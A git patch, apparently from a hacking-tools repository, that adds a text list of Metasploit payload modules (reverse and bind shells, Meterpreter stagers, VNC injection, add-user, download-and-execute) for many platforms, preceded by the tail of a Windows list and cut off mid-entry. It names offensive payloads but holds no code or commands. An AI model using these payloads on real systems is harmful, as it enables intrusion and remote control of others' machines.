Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) - windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy - windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) - windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) - windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager - windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager - windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS) - windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support - windows/vncinject/reverse_udp normal No VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support - windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp) - windows/x64/exec normal No Windows x64 Execute Command - windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path - windows/x64/messagebox normal No Windows MessageBox x64 - windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager - windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager - windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager - windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) - windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager - windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager - windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) - windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp) - windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64) - windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64) - windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64) - windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64) - windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) - windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64 - windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager - windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager - windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager - windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) - windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager - windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline - windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline - windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager - windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager - windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager - windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64) - windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager - windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) - windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp) From 37db68f35ef4eb19916b2e714ba01fa810af742a Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 6 Apr 2019 11:55:13 -0500 Subject: [PATCH 087/214] Add files via upload --- tools/payloads.txt | 553 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 553 insertions(+) create mode 100644 tools/payloads.txt diff --git a/tools/payloads.txt b/tools/payloads.txt new file mode 100644 index 0000000..b6725fb --- /dev/null +++ b/tools/payloads.txt @@ -0,0 +1,553 @@ +Payloads +======== + + Name Disclosure Date Rank Check Description + ---- --------------- ---- ----- ----------- + aix/ppc/shell_bind_tcp normal No AIX Command Shell, Bind TCP Inline + aix/ppc/shell_find_port normal No AIX Command Shell, Find Port Inline + aix/ppc/shell_interact normal No AIX execve Shell for inetd + aix/ppc/shell_reverse_tcp normal No AIX Command Shell, Reverse TCP Inline + android/meterpreter/reverse_http normal No Android Meterpreter, Android Reverse HTTP Stager + android/meterpreter/reverse_https normal No Android Meterpreter, Android Reverse HTTPS Stager + android/meterpreter/reverse_tcp normal No Android Meterpreter, Android Reverse TCP Stager + android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline + android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline + android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline + android/shell/reverse_http normal No Command Shell, Android Reverse HTTP Stager + android/shell/reverse_https normal No Command Shell, Android Reverse HTTPS Stager + android/shell/reverse_tcp normal No Command Shell, Android Reverse TCP Stager + apple_ios/aarch64/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline + apple_ios/aarch64/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline + apple_ios/aarch64/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline + apple_ios/aarch64/shell_reverse_tcp normal No Apple iOS aarch64 Command Shell, Reverse TCP Inline + apple_ios/armle/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline + apple_ios/armle/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline + apple_ios/armle/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline + bsd/sparc/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline + bsd/sparc/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + bsd/vax/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + bsd/x64/exec normal No BSD x64 Execute Command + bsd/x64/shell_bind_ipv6_tcp normal No BSD x64 Command Shell, Bind TCP Inline (IPv6) + bsd/x64/shell_bind_tcp normal No BSD x64 Shell Bind TCP + bsd/x64/shell_bind_tcp_small normal No BSD x64 Command Shell, Bind TCP Inline + bsd/x64/shell_reverse_ipv6_tcp normal No BSD x64 Command Shell, Reverse TCP Inline (IPv6) + bsd/x64/shell_reverse_tcp normal No BSD x64 Shell Reverse TCP + bsd/x64/shell_reverse_tcp_small normal No BSD x64 Command Shell, Reverse TCP Inline + bsd/x86/exec normal No BSD Execute Command + bsd/x86/metsvc_bind_tcp normal No FreeBSD Meterpreter Service, Bind TCP + bsd/x86/metsvc_reverse_tcp normal No FreeBSD Meterpreter Service, Reverse TCP Inline + bsd/x86/shell/bind_ipv6_tcp normal No BSD Command Shell, Bind TCP Stager (IPv6) + bsd/x86/shell/bind_tcp normal No BSD Command Shell, Bind TCP Stager + bsd/x86/shell/find_tag normal No BSD Command Shell, Find Tag Stager + bsd/x86/shell/reverse_ipv6_tcp normal No BSD Command Shell, Reverse TCP Stager (IPv6) + bsd/x86/shell/reverse_tcp normal No BSD Command Shell, Reverse TCP Stager + bsd/x86/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline + bsd/x86/shell_bind_tcp_ipv6 normal No BSD Command Shell, Bind TCP Inline (IPv6) + bsd/x86/shell_find_port normal No BSD Command Shell, Find Port Inline + bsd/x86/shell_find_tag normal No BSD Command Shell, Find Tag Inline + bsd/x86/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + bsd/x86/shell_reverse_tcp_ipv6 normal No BSD Command Shell, Reverse TCP Inline (IPv6) + bsdi/x86/shell/bind_tcp normal No BSDi Command Shell, Bind TCP Stager + bsdi/x86/shell/reverse_tcp normal No BSDi Command Shell, Reverse TCP Stager + bsdi/x86/shell_bind_tcp normal No BSDi Command Shell, Bind TCP Inline + bsdi/x86/shell_find_port normal No BSDi Command Shell, Find Port Inline + bsdi/x86/shell_reverse_tcp normal No BSDi Command Shell, Reverse TCP Inline + cmd/mainframe/apf_privesc_jcl normal No JCL to Escalate Privileges + cmd/mainframe/bind_shell_jcl normal No Z/OS (MVS) Command Shell, Bind TCP + cmd/mainframe/generic_jcl normal No Generic JCL Test for Mainframe Exploits + cmd/mainframe/reverse_shell_jcl normal No Z/OS (MVS) Command Shell, Reverse TCP + cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK) + cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd) + cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd) + cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua) + cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat) + cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e) + cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6 + cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs) + cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) + cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 + cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R) + cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) + cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 + cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat) + cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub) + cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh) + cmd/unix/generic normal No Unix Command, Generic Command Execution + cmd/unix/interact normal No Unix Command, Interact with Established Connection + cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) + cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK) + cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp) + cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) + cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh) + cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua) + cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat) + cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat) + cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e) + cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs) + cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl) + cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) + cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) + cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php) + cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python) + cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python) + cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R) + cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) + cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) + cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat) + cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) + cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub) + cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh) + cmd/windows/adduser normal No Windows Execute net user /ADD CMD + cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua) + cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl) + cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6 + cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby) + cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS + cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs) + cmd/windows/generic normal No Windows Command, Generic Command Execution + cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua) + cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl) + cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell) + cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby) + firefox/exec normal No Firefox XPCOM Execute Command + firefox/shell_bind_tcp normal No Command Shell, Bind TCP (via Firefox XPCOM script) + firefox/shell_reverse_tcp normal No Command Shell, Reverse TCP (via Firefox XPCOM script) + generic/custom normal No Custom Payload + generic/debug_trap normal No Generic x86 Debug Trap + generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline + generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline + generic/tight_loop normal No Generic x86 Tight Loop + java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline + java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline + java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager + java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager + java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager + java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager + java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager + java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager + java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline + linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager + linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/armbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/armbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/armbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/armbe/shell_bind_tcp normal No Linux ARM Big Endian Command Shell, Bind TCP Inline + linux/armle/adduser normal No Linux Add User + linux/armle/exec normal No Linux Execute Command + linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager + linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager + linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager + linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/mips64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/mips64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/mips64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/mipsbe/exec normal No Linux Execute Command + linux/mipsbe/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + linux/mipsbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/mipsbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/mipsbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/mipsbe/reboot normal No Linux Reboot + linux/mipsbe/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + linux/mipsbe/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + linux/mipsbe/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/mipsle/exec normal No Linux Execute Command + linux/mipsle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + linux/mipsle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/mipsle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/mipsle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/mipsle/reboot normal No Linux Reboot + linux/mipsle/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + linux/mipsle/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + linux/mipsle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/ppc/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/ppc/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/ppc/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/ppc/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + linux/ppc/shell_find_port normal No Linux Command Shell, Find Port Inline + linux/ppc/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/ppc64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + linux/ppc64/shell_find_port normal No Linux Command Shell, Find Port Inline + linux/ppc64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/ppc64le/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/ppc64le/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/ppc64le/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/ppce500v2/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/ppce500v2/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/ppce500v2/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/x64/exec normal No Linux Execute Command + linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager + linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager + linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager + linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6) + linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline + linux/x64/shell_find_port normal No Linux Command Shell, Find Port Inline + linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6) + linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/x86/adduser normal No Linux Add User + linux/x86/chmod normal No Linux Chmod + linux/x86/exec normal No Linux Execute Command + linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) + linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) + linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager + linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86) + linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86) + linux/x86/meterpreter/find_tag normal No Linux Mettle x86, Find Tag Stager + linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6) + linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager + linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager + linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager + linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP + linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline + linux/x86/read_file normal No Linux Read File + linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager + linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86) + linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + linux/x86/shell/find_tag normal No Linux Command Shell, Find Tag Stager + linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6) + linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager + linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager + linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6) + linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline + linux/x86/shell_find_port normal No Linux Command Shell, Find Port Inline + linux/x86/shell_find_tag normal No Linux Command Shell, Find Tag Inline + linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) + linux/zarch/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + linux/zarch/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + linux/zarch/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + mainframe/shell_reverse_tcp normal No Z/OS (MVS) Command Shell, Reverse TCP Inline + multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures) + multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures) + netware/shell/reverse_tcp normal No NetWare Command Shell, Reverse TCP Stager + nodejs/shell_bind_tcp normal No Command Shell, Bind TCP (via nodejs) + nodejs/shell_reverse_tcp normal No Command Shell, Reverse TCP (via nodejs) + nodejs/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via nodejs) + osx/armle/execute/bind_tcp normal No OS X Write and Execute Binary, Bind TCP Stager + osx/armle/execute/reverse_tcp normal No OS X Write and Execute Binary, Reverse TCP Stager + osx/armle/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager + osx/armle/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager + osx/armle/shell_bind_tcp normal No Apple iOS Command Shell, Bind TCP Inline + osx/armle/shell_reverse_tcp normal No Apple iOS Command Shell, Reverse TCP Inline + osx/armle/vibrate normal No Apple iOS iPhone Vibrate + osx/ppc/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager + osx/ppc/shell/find_tag normal No OS X Command Shell, Find Tag Stager + osx/ppc/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager + osx/ppc/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline + osx/ppc/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline + osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager + osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager + osx/x64/exec normal No OS X x64 Execute Command + osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager + osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager + osx/x64/meterpreter_reverse_http normal No OSX Meterpreter, Reverse HTTP Inline + osx/x64/meterpreter_reverse_https normal No OSX Meterpreter, Reverse HTTPS Inline + osx/x64/meterpreter_reverse_tcp normal No OSX Meterpreter, Reverse TCP Inline + osx/x64/say normal No OS X x64 say Shellcode + osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP + osx/x64/shell_find_tag normal No OSX Command Shell, Find Tag Inline + osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP + osx/x86/bundleinject/bind_tcp normal No Mac OS X Inject Mach-O Bundle, Bind TCP Stager + osx/x86/bundleinject/reverse_tcp normal No Mac OS X Inject Mach-O Bundle, Reverse TCP Stager + osx/x86/exec normal No OS X Execute Command + osx/x86/isight/bind_tcp normal No Mac OS X x86 iSight Photo Capture, Bind TCP Stager + osx/x86/isight/reverse_tcp normal No Mac OS X x86 iSight Photo Capture, Reverse TCP Stager + osx/x86/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline + osx/x86/shell_find_port normal No OS X Command Shell, Find Port Inline + osx/x86/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline + osx/x86/vforkshell/bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Stager + osx/x86/vforkshell/reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Stager + osx/x86/vforkshell_bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Inline + osx/x86/vforkshell_reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Inline + php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl) + php/bind_perl_ipv6 normal No PHP 